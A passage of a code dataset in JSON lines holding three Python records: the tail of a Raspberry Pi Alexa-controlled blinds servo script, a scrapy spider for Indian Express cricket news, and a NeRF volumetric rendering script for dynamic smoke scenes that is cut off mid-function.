\"open\":\n status.value = False\n \n if status.value == True:\n print(\"true ting\")\n #current_elevation, dawn_elevation, dusk_elevation = get_elevation()\n #if current_elevation < dawn_elevation or current_elevation < dusk_aacelevation:\n # print(\"it is early morning or night \", current_elevation)\n # pwm.set_servo_pulsewidth( servo, 500 ) ;\n #elif current_elevation > dawn_elevation or current_elevation > dusk_elevation:\n # print(\"it is daytime \", current_elevation)\n # pwm.set_servo_pulsewidth( servo, 2500 ) ;\n if status.value == False:\n print(\"false ting\")\n time.sleep(1)\"\"\"\n\n\nif __name__=='__main__':\n \n #recording_on=Value('b', True)\n #p = Process (target=automate, args=(recording_on,))\n #p.start()\n app.run(debug=True,use_reloader=False)\n #p.join()\n\n\"\"\"\n\n \n\n#if the current elevation is less than dawn or dusk, then servo should be drivenn till endstop 1 active\n#if the current elevation is anything else, then servo should be driven till endstop 2 active\n#if the servo has been on for more than x amount of time, shut it down.\ntry:\n while True:\n current_elevation, dawn_elevation, dusk_elevation = get_elevation()\n #if 
GPIO.input(LimitSwitchShut):\n if current_elevation < dawn_elevation or current_elevation < dusk_aacelevation:\n print(\"it is early morning or night \", current_elevation)\n #if GPIO.input(LimitSwitchShut):\n pwm.set_servo_pulsewidth( servo, 500 ) ;\n time.sleep(1)\n #else:\n pwm.set_PWM_dutycycle(servo, 0);\n #pwm.set_PWM_freqduency( servo, 0 );\n elif current_elevation > dawn_elevation or current_elevation > dusk_elevation:\n #print(\"it is daytime \", current_elevation)\n #if GPIO.input(LimitSwitchOpen):\n pwm.set_servo_pulsewidth( servo, 2500 ) ;\n time.sleep(1)\n #else:\n pwm.set_PWM_dutycycle(servo, 0);\n #pwm.set_PWM_frequency( servo, 0 );\nexcept KeyboardInterrupt:\n print(\"interrupted\")\n pwm.set_PWM_dutycycle(servo, 0)\n pwm.set_PWM_frequency( servo, 0 )\n #pwm.set_PWM_dutycycle(servo, 0)\n #pwm.set_PWM_frequency( servo, 0 )\"\"\"\n\n\n\n", "repo_name": "ShafaeAli/Bedroom-Lighting-Future", "sub_path": "circadian_rhythm/pi4_sunset_blinds/blinds_alexa.py", "file_name": "blinds_alexa.py", "file_ext": "py", "file_size_in_byte": 4720, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "RPi.GPIO.setmode", "line_number": 20, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 20, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pigpio.pi", "line_number": 30, "usage_type": "call"}, {"api_name": "pigpio.OUTPUT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "astral.LocationInfo", "line_number": 38, "usage_type": "call"}, {"api_name": "astral.sun.sun", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 53, "usage_type": "call"}, {"api_name": "flask_ask.Ask", "line_number": 54, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 69, "usage_type": "call"}, {"api_name": "flask_ask.statement", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "36544091854", "text": "import scrapy\nfrom datetime import datetime\n\n\nclass CricketSpider(scrapy.Spider):\n name = \"cricket\"\n start_urls = [\n 'https://indianexpress.com/section/sports/cricket/page/1/',\n ]\n\n def parse(self, response, **kwargs):\n today_news_end = False\n for news in response.css('div.articles'):\n result = {\n 'title': news.css('.title a::text').get(),\n 'date': news.css('.date::text').get(),\n 'a': news.css('.title a::attr(href)').get(),\n }\n if result['date'].split(',')[0].strip() != datetime.now().strftime('%B %d'):\n today_news_end = True\n break\n request = scrapy.http.Request(\n url=result['a'],\n callback=self.parse_details,\n meta={\"result\": result}\n )\n yield request\n\n next_page = response.css('a.next::attr(href)').get()\n if next_page is not None and not today_news_end:\n yield response.follow(next_page, callback=self.parse)\n\n def parse_details(self, response):\n result = response.meta.get('result')\n lis_of_string = response.css(\n ''' #pcl-full-content>p::text, \n #pcl-full-content>.ev-meter-content > p::text , \n .custom-caption+ p::text , \n .hlt-bot-text p~ p+ p::text , \n .ev-meter-content .ev-meter-content p::text '''\n ).getall()\n content = '\\n\\n'.join(lis_of_string)\n image_url = response.css('.custom-caption img::attr(src)').getall()\n\n for url in image_url:\n if '.jpg' in url:\n image_url = url\n break\n else:\n image_url = image_url[:1]\n\n result['content'] = content\n result['image_url'] = image_url\n\n yield dict(result)\n\n", "repo_name": "Parth971/Python-Material", "sub_path": "training tasks/SCRAPPING/scrapy/news_scrapy_project/tutorial/spiders/cricket.py", "file_name": "cricket.py", "file_ext": "py", "file_size_in_byte": 1850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "scrapy.Spider", "line_number": 5, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "scrapy.http.Request", "line_number": 22, "usage_type": "call"}, {"api_name": "scrapy.http", "line_number": 22, "usage_type": "attribute"}]}
+{"seq_id": "16500640899", "text": "import os, sys\nimport numpy as np\nimport imageio\nimport json\nimport random\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nif hasattr(sys.stderr, 'isatty') and sys.stderr.isatty():\n from tqdm import tqdm, trange\nelse:\n def tqdm(iterable, **kwargs): return iterable\n trange = range\n\nimport matplotlib.pyplot as plt\n\nfrom run_nerf_helpers import *\n\nfrom nerf_load.load_llff import load_llff_data\nfrom nerf_load.load_deepvoxels import load_dv_data\nfrom nerf_load.load_blender import load_blender_data\nfrom nerf_load.load_LINEMOD import load_LINEMOD_data\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nnp.random.seed(42)\nDEBUG = False\n\ndef set_rand_seed(seed):\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic=True\n\n\ndef batchify(fn, chunk):\n \"\"\"Constructs a version of 'fn' that applies to smaller batches.\n \"\"\"\n if chunk is None:\n return fn\n def ret(inputs):\n return torch.cat([fn(inputs[i:i+chunk]) for i in range(0, inputs.shape[0], chunk)], 0)\n return ret\n\n\ndef run_network(inputs, viewdirs, fn, embed_fn, embeddirs_fn, netchunk=1024*64):\n \"\"\"Prepares inputs and applies network 'fn'.\n \"\"\"\n inputs_flat = torch.reshape(inputs, [-1, inputs.shape[-1]])\n embedded = embed_fn(inputs_flat)\n\n if viewdirs is not None:\n input_dirs = viewdirs[:,None].expand(inputs.shape)\n input_dirs_flat = torch.reshape(input_dirs, [-1, input_dirs.shape[-1]])\n embedded_dirs = embeddirs_fn(input_dirs_flat)\n embedded = torch.cat([embedded, embedded_dirs], -1)\n\n outputs_flat = batchify(fn, netchunk)(embedded)\n outputs = torch.reshape(outputs_flat, list(inputs.shape[:-1]) + [outputs_flat.shape[-1]])\n return outputs\n\n\ndef batchify_rays(rays_flat, chunk=1024*32, **kwargs):\n \"\"\"Render rays in smaller minibatches to avoid OOM.\n \"\"\"\n all_ret = {}\n for i in range(0, rays_flat.shape[0], chunk):\n ret = render_rays(rays_flat[i:i+chunk], **kwargs)\n for k in ret:\n if k not in all_ret:\n all_ret[k] = []\n all_ret[k].append(ret[k])\n\n all_ret = {k : torch.cat(all_ret[k], 0) for k in all_ret}\n return all_ret\n\n\ndef render(H, W, K, chunk=1024*32, rays=None, c2w=None, ndc=True,\n near=0., far=1.,\n use_viewdirs=False, c2w_staticcam=None,\n time_step=None, bkgd_color=None,\n **kwargs):\n \"\"\"Render rays\n Args:\n H: int. Height of image in pixels.\n W: int. Width of image in pixels.\n focal: float. Focal length of pinhole camera.\n chunk: int. Maximum number of rays to process simultaneously. Used to\n control maximum memory usage. Does not affect final results.\n rays: array of shape [2, batch_size, 3]. Ray origin and direction for\n each example in batch.\n c2w: array of shape [3, 4]. Camera-to-world transformation matrix.\n ndc: bool. If True, represent ray origin, direction in NDC coordinates.\n near: float or array of shape [batch_size]. Nearest distance for a ray.\n far: float or array of shape [batch_size]. Farthest distance for a ray.\n use_viewdirs: bool. If True, use viewing direction of a point in space in model.\n c2w_staticcam: array of shape [3, 4]. If not None, use this transformation matrix for \n camera while using other c2w argument for viewing directions.\n Returns:\n rgb_map: [batch_size, 3]. Predicted RGB values for rays.\n disp_map: [batch_size]. Disparity map. Inverse of depth.\n acc_map: [batch_size]. 
Accumulated opacity (alpha) along a ray.\n extras: dict with everything returned by render_rays().\n \"\"\"\n if c2w is not None:\n # special case to render full image\n rays_o, rays_d = get_rays(H, W, K, c2w)\n else:\n # use provided ray batch\n rays_o, rays_d = rays\n\n if use_viewdirs:\n # provide ray directions as input\n viewdirs = rays_d\n if c2w_staticcam is not None:\n # special case to visualize effect of viewdirs\n rays_o, rays_d = get_rays(H, W, K, c2w_staticcam)\n viewdirs = viewdirs / torch.norm(viewdirs, dim=-1, keepdim=True)\n viewdirs = torch.reshape(viewdirs, [-1,3]).float()\n\n sh = rays_d.shape # [..., 3]\n if ndc:\n # for forward facing scenes\n rays_o, rays_d = ndc_rays(H, W, K[0][0], 1., rays_o, rays_d)\n\n # Create ray batch\n rays_o = torch.reshape(rays_o, [-1,3]).float()\n rays_d = torch.reshape(rays_d, [-1,3]).float()\n\n near, far = near * torch.ones_like(rays_d[...,:1]), far * torch.ones_like(rays_d[...,:1])\n rays = torch.cat([rays_o, rays_d, near, far], -1)\n if use_viewdirs:\n rays = torch.cat([rays, viewdirs], -1)\n\n if time_step != None:\n time_step = time_step.expand(list(rays.shape[0:-1]) + [1])\n # (ray origin, ray direction, min dist, max dist, normalized viewing direction, t)\n rays = torch.cat([rays, time_step], dim=-1)\n # Render and reshape\n all_ret = batchify_rays(rays, chunk, **kwargs)\n for k in all_ret:\n k_sh = list(sh[:-1]) + list(all_ret[k].shape[1:])\n all_ret[k] = torch.reshape(all_ret[k], k_sh)\n\n if bkgd_color is not None:\n torch_bkgd_color = torch.Tensor(bkgd_color).to(device)\n # rgb map for model: fine, coarse, merged, dynamic_fine, dynamic_coarse\n for _i in ['_map', '0', 'h1', 'h10', 'h2', 'h20']: # add background for synthetic scenes, for image-based supervision\n rgb_i, acc_i = 'rgb'+_i, 'acc'+_i\n if (rgb_i in all_ret) and (acc_i in all_ret):\n all_ret[rgb_i] = all_ret[rgb_i] + torch_bkgd_color*(1.-all_ret[acc_i][..., None])\n\n k_extract = ['rgb_map', 'disp_map', 'acc_map']\n ret_list = [all_ret[k] for k in k_extract]\n ret_dict = {k : all_ret[k] for k in all_ret if k not in k_extract}\n return ret_list + [ret_dict]\n\n\ndef render_path(render_poses, hwf, K, chunk, render_kwargs, gt_imgs=None, savedir=None, render_factor=0, render_steps=None, bkgd_color=None):\n\n H, W, focal = hwf\n\n if render_factor!=0:\n # Render downsampled for speed\n H = H//render_factor\n W = W//render_factor\n focal = focal/render_factor\n\n rgbs = []\n disps = []\n\n t = time.time()\n cur_timestep = None\n for i, c2w in enumerate(tqdm(render_poses)):\n print(i, time.time() - t)\n if render_steps is not None:\n cur_timestep = render_steps[i]\n t = time.time()\n rgb, disp, acc, extras = render(H, W, K, chunk=chunk, c2w=c2w[:3,:4], time_step=cur_timestep, bkgd_color=bkgd_color, **render_kwargs)\n rgbs.append(rgb.cpu().numpy())\n disps.append(disp.cpu().numpy())\n if i==0:\n print(rgb.shape, disp.shape)\n\n \"\"\"\n if gt_imgs is not None and render_factor==0:\n p = -10. 
* np.log10(np.mean(np.square(rgb.cpu().numpy() - gt_imgs[i])))\n print(p)\n \"\"\"\n\n if savedir is not None:\n rgb8 = to8b(rgbs[-1])\n filename = os.path.join(savedir, '{:03d}.png'.format(i))\n imageio.imwrite(filename, rgb8)\n\n other_rgbs = []\n if gt_imgs is not None:\n other_rgbs.append(gt_imgs[i])\n for rgb_i in ['rgbh1','rgbh2','rgb0']: \n if rgb_i in extras:\n _data = extras[rgb_i].cpu().numpy()\n other_rgbs.append(_data)\n if len(other_rgbs) >= 1:\n other_rgb8 = np.concatenate(other_rgbs, axis=1)\n other_rgb8 = to8b(other_rgb8)\n filename = os.path.join(savedir, '_{:03d}.png'.format(i))\n imageio.imwrite(filename, other_rgb8)\n\n rgbs = np.stack(rgbs, 0)\n disps = np.stack(disps, 0)\n\n return rgbs, disps\n\n\ndef create_nerf(args, vel_model=None, bbox_model=None, ndim=3):\n \"\"\"Instantiate NeRF's MLP model.\n \"\"\"\n embed_fn, input_ch = get_embedder(args.multires, args.i_embed, ndim)\n\n input_ch_views = 0\n embeddirs_fn = None\n if args.use_viewdirs:\n embeddirs_fn, input_ch_views = get_embedder(args.multires_views, args.i_embed, dim=ndim)\n output_ch = 4 # 5 if args.N_importance > 0 else 4\n skips = [4]\n\n my_model_dict = {\n \"nerf\":NeRF,\n \"siren\":SIREN_NeRFt,\n \"hybrid\":SIREN_Hybrid,\n }\n model_args = {}\n if args.fading_layers > 0:\n if args.net_model == \"siren\":\n model_args[\"fading_fin_step\"] = args.fading_layers\n elif args.net_model == \"hybrid\":\n model_args[\"fading_fin_step_static\"] = args.fading_layers\n model_args[\"fading_fin_step_dynamic\"] = args.fading_layers\n if bbox_model is not None:\n model_args[\"bbox_model\"] = bbox_model\n\n my_model = my_model_dict[args.net_model]\n\n model = my_model(D=args.netdepth, W=args.netwidth,\n input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs, **model_args)\n if args.net_model == \"hybrid\":\n model.toDevice(device)\n model = model.to(device)\n \n grad_vars = list(model.parameters())\n\n model_fine = None\n if args.N_importance > 0:\n model_fine = my_model(D=args.netdepth_fine, W=args.netwidth_fine,\n input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs, **model_args)\n if args.net_model == \"hybrid\":\n model_fine.toDevice(device)\n model_fine = model_fine.to(device)\n grad_vars += list(model_fine.parameters())\n\n network_query_fn = lambda inputs, viewdirs, network_fn : run_network(inputs, viewdirs, network_fn,\n embed_fn=embed_fn,\n embeddirs_fn=embeddirs_fn,\n netchunk=args.netchunk)\n\n # Create optimizer\n optimizer = torch.optim.Adam(params=grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n vel_optimizer = None\n if vel_model is not None:\n vel_grad_vars = list(vel_model.parameters())\n vel_optimizer = torch.optim.Adam(params=vel_grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n\n start = 0\n basedir = args.basedir\n expname = args.expname\n\n ##########################\n # Load checkpoints\n if args.ft_path is not None and args.ft_path!='None':\n ckpts = [args.ft_path]\n else:\n ckpts = [os.path.join(basedir, expname, f) for f in sorted(os.listdir(os.path.join(basedir, expname))) if 'tar' in f]\n\n print('Found ckpts', ckpts)\n if len(ckpts) > 0 and not args.no_reload:\n ckpt_path = ckpts[-1]\n print('Reloading from', ckpt_path)\n ckpt = torch.load(ckpt_path)\n\n start = ckpt['global_step']\n optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n \n # Load model\n if args.net_model == \"hybrid\":\n model.static_model.load_state_dict(ckpt['network_fn_state_dict_static'])\n 
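# note: hybrid checkpoints keep the static and dynamic sub-networks under separate keys (see the dict keys above), so each sub-module is restored on its own\n            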
if model_fine is not None:\n model_fine.static_model.load_state_dict(ckpt['network_fine_state_dict_static'])\n model.dynamic_model.load_state_dict(ckpt['network_fn_state_dict_dynamic'])\n if model_fine is not None:\n model_fine.dynamic_model.load_state_dict(ckpt['network_fine_state_dict_dynamic'])\n else:\n model.load_state_dict(ckpt['network_fn_state_dict'])\n if model_fine is not None:\n model_fine.load_state_dict(ckpt['network_fine_state_dict'])\n \n if vel_model is not None:\n if 'network_vel_state_dict' in ckpt:\n vel_model.load_state_dict(ckpt['network_vel_state_dict'])\n if vel_optimizer is not None:\n if 'vel_optimizer_state_dict' in ckpt:\n vel_optimizer.load_state_dict(ckpt['vel_optimizer_state_dict'])\n ##########################\n\n render_kwargs_train = {\n 'network_query_fn' : network_query_fn,\n 'perturb' : args.perturb,\n 'N_importance' : args.N_importance,\n 'network_fine' : model_fine,\n 'N_samples' : args.N_samples,\n 'network_fn' : model,\n 'use_viewdirs' : args.use_viewdirs,\n 'raw_noise_std' : args.raw_noise_std,\n }\n\n # NDC only good for LLFF-style forward facing data\n if args.dataset_type != 'llff' or args.no_ndc:\n print('Not ndc!')\n render_kwargs_train['ndc'] = False\n render_kwargs_train['lindisp'] = args.lindisp\n\n render_kwargs_test = {k : render_kwargs_train[k] for k in render_kwargs_train}\n render_kwargs_test['perturb'] = False\n render_kwargs_test['raw_noise_std'] = 0.\n\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer, vel_optimizer\n\n\ndef raw2outputs(raw_list, z_vals, rays_d, raw_noise_std=0, pytest=False, remove99=False):\n \"\"\"Transforms model's predictions to semantically meaningful values.\n Args:\n raw_list: a list of tensors in shape [num_rays, num_samples along ray, 4]. Prediction from model.\n z_vals: [num_rays, num_samples along ray]. Integration time.\n rays_d: [num_rays, 3]. Direction of each ray.\n Returns:\n rgb_map: [num_rays, 3]. Estimated RGB color of a ray.\n disp_map: [num_rays]. Disparity map. Inverse of depth map.\n acc_map: [num_rays]. Sum of weights along each ray.\n weights: [num_rays, num_samples]. Weights assigned to each sampled color.\n depth_map: [num_rays]. 
Estimated distance to object.\n    \"\"\"\n    raw2alpha = lambda raw, dists, act_fn=F.relu: 1.-torch.exp(-act_fn(raw)*dists)\n\n    dists = z_vals[...,1:] - z_vals[...,:-1]\n    dists = torch.cat([dists, torch.Tensor([1e10]).expand(dists[...,:1].shape)], -1) # [N_rays, N_samples]\n\n    dists = dists * torch.norm(rays_d[...,None,:], dim=-1)\n\n    noise = 0.\n    alpha_list = []\n    color_list = []\n    for raw in raw_list:\n        if raw is None: continue\n        if raw_noise_std > 0.:\n            noise = torch.randn(raw[...,3].shape) * raw_noise_std\n\n            # Overwrite randomly sampled data if pytest\n            if pytest:\n                np.random.seed(42)\n                noise = np.random.rand(*list(raw[...,3].shape)) * raw_noise_std\n                noise = torch.Tensor(noise)\n        \n        alpha = raw2alpha(raw[...,3] + noise, dists) # [N_rays, N_samples]\n        if remove99:\n            alpha = torch.where(alpha > 0.99, torch.zeros_like(alpha), alpha)\n        rgb = torch.sigmoid(raw[..., :3]) # [N_rays, N_samples, 3]\n\n        alpha_list += [alpha]\n        color_list += [rgb]\n    \n    densTiStack = torch.stack([1.-alpha for alpha in alpha_list], dim=-1) \n    # [N_rays, N_samples, N_raws]\n    densTi = torch.prod(densTiStack, dim=-1, keepdim=True) \n    # [N_rays, N_samples, 1]\n    densTi_all = torch.cat([densTiStack, densTi], dim=-1) \n    # [N_rays, N_samples, N_raws + 1] \n    Ti_all = torch.cumprod(densTi_all + 1e-10, dim=-2) # accumulate along samples\n    Ti_all = Ti_all / (densTi_all + 1e-10)\n    # [N_rays, N_samples, N_raws + 1], exclusive\n    weights_list = [alpha * Ti_all[...,-1] for alpha in alpha_list] # a list of [N_rays, N_samples]\n    self_weights_list = [alpha_list[alpha_i] * Ti_all[...,alpha_i] for alpha_i in range(len(alpha_list))] # a list of [N_rays, N_samples]\n\n    def weighted_sum_of_samples(wei_list, content_list=None, content=None):\n        content_map_list = []\n        if content_list is not None:\n            content_map_list = [\n                torch.sum(weights[..., None] * ct, dim=-2) \n                # [N_rays, N_content], weighted sum along samples\n                for weights, ct in zip(wei_list, content_list)\n            ]\n        elif content is not None:\n            content_map_list = [\n                torch.sum(weights * content, dim=-1) \n                # [N_rays], weighted sum along samples\n                for weights in wei_list\n            ]\n        content_map = torch.stack(content_map_list, dim=-1) \n        # [N_rays, (N_contentlist,) N_raws]\n        content_sum = torch.sum(content_map, dim=-1) \n        # [N_rays, (N_contentlist,)]\n        return content_sum, content_map\n\n    rgb_map, _ = weighted_sum_of_samples(weights_list, color_list) # [N_rays, 3]\n    # Sum of weights along each ray. 
This value is in [0, 1] up to numerical error.\n    acc_map, _ = weighted_sum_of_samples(weights_list, None, 1) # [N_rays]\n\n    _, rgb_map_stack = weighted_sum_of_samples(self_weights_list, color_list)\n    _, acc_map_stack = weighted_sum_of_samples(self_weights_list, None, 1)\n\n    # Estimated depth map is expected distance.\n    # Disparity map is inverse depth.\n    depth_map, _ = weighted_sum_of_samples(weights_list, None, z_vals) # [N_rays]\n    disp_map = 1./torch.max(1e-10 * torch.ones_like(depth_map), depth_map / acc_map)\n    # alpha * Ti\n    weights = (1.-densTi)[...,0] * Ti_all[...,-1] # [N_rays, N_samples]\n    \n    # weights = alpha * torch.cumprod(torch.cat([torch.ones((alpha.shape[0], 1)), 1.-alpha + 1e-10], -1), -1)[:, :-1]\n    # rgb_map = torch.sum(weights[...,None] * rgb, -2) # [N_rays, 3]\n    # depth_map = torch.sum(weights * z_vals, -1)\n    # acc_map = torch.sum(weights, -1)\n\n    return rgb_map, disp_map, acc_map, weights, depth_map, Ti_all[...,-1], rgb_map_stack, acc_map_stack\n\n\ndef render_rays(ray_batch,\n                network_fn,\n                network_query_fn,\n                N_samples,\n                retraw=False,\n                lindisp=False,\n                perturb=0.,\n                N_importance=0,\n                network_fine=None,\n                raw_noise_std=0.,\n                verbose=False,\n                pytest=False,\n                has_t = False,\n                vel_model=None,\n                netchunk=1024*64,\n                warp_fading_dt=None,\n                warp_mod=\"rand\",\n                remove99=False):\n    \"\"\"Volumetric rendering.\n    Args:\n      ray_batch: array of shape [batch_size, ...]. All information necessary\n        for sampling along a ray, including: ray origin, ray direction, min\n        dist, max dist, and unit-magnitude viewing direction.\n      network_fn: function. Model for predicting RGB and density at each point\n        in space.\n      network_query_fn: function used for passing queries to network_fn.\n      N_samples: int. Number of different times to sample along each ray.\n      retraw: bool. If True, include model's raw, unprocessed predictions.\n      lindisp: bool. If True, sample linearly in inverse depth rather than in depth.\n      perturb: float, 0 or 1. If non-zero, each ray is sampled at stratified\n        random points in time.\n      N_importance: int. Number of additional times to sample along each ray.\n        These samples are only passed to network_fine.\n      network_fine: \"fine\" network with same spec as network_fn.\n      raw_noise_std: float. Std dev of the noise added to regularize the raw density output.\n      verbose: bool. If True, print more debugging info.\n\n      warp_fading_dt: to train nearby frames with flow-based warping, fading * delta_t.\n    Returns:\n      rgb_map: [num_rays, 3]. Estimated RGB color of a ray. Comes from fine model.\n      disp_map: [num_rays]. Disparity map. 1 / depth.\n      acc_map: [num_rays]. Accumulated opacity along each ray. Comes from fine model.\n      raw: [num_rays, num_samples, 4]. Raw predictions from model.\n      rgb0: See rgb_map. Output for coarse model.\n      disp0: See disp_map. Output for coarse model.\n      acc0: See acc_map. Output for coarse model.\n      z_std: [num_rays]. 
Standard deviation of distances along ray for each\n        sample.\n    \"\"\"\n    N_rays = ray_batch.shape[0]\n    rays_o, rays_d = ray_batch[:,0:3], ray_batch[:,3:6] # [N_rays, 3] each\n    rays_t, viewdirs = None, None\n    if has_t:\n        rays_t = ray_batch[:,-1:] # [N_rays, 1]\n        viewdirs = ray_batch[:, -4:-1] if ray_batch.shape[-1] > 9 else None\n    elif ray_batch.shape[-1] > 8:\n        viewdirs = ray_batch[:,-3:]\n\n    bounds = torch.reshape(ray_batch[...,6:8], [-1,1,2])\n    near, far = bounds[...,0], bounds[...,1] # [-1,1]\n\n    t_vals = torch.linspace(0., 1., steps=N_samples)\n    if not lindisp:\n        z_vals = near * (1.-t_vals) + far * (t_vals)\n    else:\n        z_vals = 1./(1./near * (1.-t_vals) + 1./far * (t_vals))\n\n    z_vals = z_vals.expand([N_rays, N_samples])\n\n    if perturb > 0.:\n        # get intervals between samples\n        mids = .5 * (z_vals[...,1:] + z_vals[...,:-1])\n        upper = torch.cat([mids, z_vals[...,-1:]], -1)\n        lower = torch.cat([z_vals[...,:1], mids], -1)\n        # stratified samples in those intervals\n        t_rand = torch.rand(z_vals.shape)\n\n        # Pytest, overwrite u with numpy's fixed random numbers\n        if pytest:\n            np.random.seed(42)\n            t_rand = np.random.rand(*list(z_vals.shape))\n            t_rand = torch.Tensor(t_rand)\n\n        z_vals = lower + (upper - lower) * t_rand\n\n    pts = rays_o[...,None,:] + rays_d[...,None,:] * z_vals[...,:,None] # [N_rays, N_samples, 3]\n    if rays_t is not None:\n        rays_t_bc = torch.reshape(rays_t, [-1,1,1]).expand([N_rays, N_samples, 1])\n        pts = torch.cat([pts, rays_t_bc], dim = -1)\n\n    def warp_raw_random(orig_pts, orig_dir, fading, fn, mod=\"rand\", has_t=has_t):\n        # mod, \"rand\", \"forw\", \"back\", \"none\"\n        if (not has_t) or (mod==\"none\") or (vel_model is None):\n            orig_raw = network_query_fn(orig_pts, orig_dir, fn) # [N_rays, N_samples, 4]\n            return orig_raw\n\n        orig_pos, orig_t = torch.split(orig_pts, [3, 1], -1)\n        \n        _vel = batchify(vel_model, netchunk)(orig_pts.view(-1,4))\n        _vel = torch.reshape(_vel, [N_rays, -1, 3])\n        # _vel.shape, [N_rays, N_samples(+N_importance), 3]\n        if mod==\"rand\":\n            # random_warpT = np.random.normal(0.0, 0.6, orig_t.get_shape().as_list())\n            # random_warpT = np.random.uniform(-3.0, 3.0, orig_t.shape)\n            random_warpT = torch.rand(orig_t.shape)*6.0 -3.0 # [-3,3]\n        else:\n            random_warpT = 1.0 if mod == \"back\" else (-1.0) # back\n        # mean and standard deviation: 0.0, 0.6, so that 3sigma < 2, train +/- 2*delta_T\n        random_warpT = random_warpT * fading\n        random_warpT = torch.as_tensor(random_warpT) # as_tensor also handles the plain float from the \"forw\"/\"back\" branch\n\n        warp_t = orig_t + random_warpT\n        warp_pos = orig_pos + _vel * random_warpT\n        warp_pts = torch.cat([warp_pos, warp_t], dim = -1)\n        warp_pts = warp_pts.detach() # stop gradient\n\n        warped_raw = network_query_fn(warp_pts, orig_dir, fn) # [N_rays, N_samples, 4]\n\n        return warped_raw\n\n    def get_raw(fn, staticpts, staticdirs, has_t=has_t):\n        static_raw, smoke_raw = None, None\n        smoke_warp_mod = warp_mod\n        if (None in [vel_model, warp_fading_dt]) or (not has_t):\n            smoke_warp_mod = \"none\"\n        \n        smoke_raw = warp_raw_random(staticpts, staticdirs, warp_fading_dt, fn, mod=smoke_warp_mod, has_t=has_t)\n        if has_t and (smoke_raw.shape[-1] > 4): # hybrid mode\n            if smoke_warp_mod == \"none\":\n                static_raw = smoke_raw\n            else:\n                static_raw = warp_raw_random(staticpts, staticdirs, warp_fading_dt, fn, mod=\"none\", has_t=True)\n\n            static_raw = static_raw[..., :4]\n            smoke_raw = smoke_raw[..., -4:]\n        \n        return smoke_raw, static_raw # [N_rays, N_samples, 4], [N_rays, N_samples, 4]\n\n    # raw = run_network(pts)\n    C_smokeRaw, C_staticRaw = get_raw(network_fn, pts, viewdirs)\n    raw = [C_smokeRaw, C_staticRaw]\n    rgb_map, 
disp_map, acc_map, weights, depth_map, ti_map, rgb_map_stack, acc_map_stack = raw2outputs(raw, z_vals, rays_d, raw_noise_std, pytest=pytest, remove99=remove99)\n\n    if raw[-1] is not None:\n        rgbh2_map = rgb_map_stack[...,0] # dynamic\n        acch2_map = acc_map_stack[...,0] # dynamic\n        rgbh1_map = rgb_map_stack[...,1] # static\n        acch1_map = acc_map_stack[...,1] # static\n    \n    # raw = network_query_fn(pts, viewdirs, network_fn)\n    # rgb_map, disp_map, acc_map, weights, depth_map = raw2outputs(raw, z_vals, rays_d, raw_noise_std, white_bkgd, pytest=pytest)\n\n    if N_importance > 0:\n\n        rgb_map_0, disp_map_0, acc_map_0 = rgb_map, disp_map, acc_map\n\n        z_vals_mid = .5 * (z_vals[...,1:] + z_vals[...,:-1])\n        z_samples = sample_pdf(z_vals_mid, weights[...,1:-1], N_importance, det=(perturb==0.), pytest=pytest)\n        z_samples = z_samples.detach()\n\n        z_vals, _ = torch.sort(torch.cat([z_vals, z_samples], -1), -1)\n        pts = rays_o[...,None,:] + rays_d[...,None,:] * z_vals[...,:,None] # [N_rays, N_samples + N_importance, 3]\n\n        if rays_t is not None:\n            rays_t_bc = torch.reshape(rays_t, [-1,1,1]).expand([N_rays, N_samples+N_importance, 1])\n            pts = torch.cat([pts, rays_t_bc], dim = -1)\n        \n        run_fn = network_fn if network_fine is None else network_fine\n        F_smokeRaw, F_staticRaw = get_raw(run_fn, pts, viewdirs)\n        raw = [F_smokeRaw, F_staticRaw]\n\n        rgb_map, disp_map, acc_map, weights, depth_map, ti_map, rgb_map_stack, acc_map_stack = raw2outputs(raw, z_vals, rays_d, raw_noise_std, pytest=pytest, remove99=remove99)\n\n        if raw[-1] is not None:\n            rgbh20_map = rgbh2_map\n            acch20_map = acch2_map\n            rgbh10_map = rgbh1_map\n            acch10_map = acch1_map\n            rgbh2_map = rgb_map_stack[...,0]\n            acch2_map = acc_map_stack[...,0]\n            rgbh1_map = rgb_map_stack[...,1]\n            acch1_map = acc_map_stack[...,1]\n        \n        # raw = run_network(pts, fn=run_fn)\n        # raw = network_query_fn(pts, viewdirs, run_fn)\n        # rgb_map, disp_map, acc_map, weights, depth_map = raw2outputs(raw, z_vals, rays_d, raw_noise_std, white_bkgd, pytest=pytest)\n\n    ret = {'rgb_map' : rgb_map, 'disp_map' : disp_map, 'acc_map' : acc_map}\n    if retraw:\n        ret['raw'] = raw[0]\n        if raw[1] is not None:\n            ret['raw_static'] = raw[1]\n   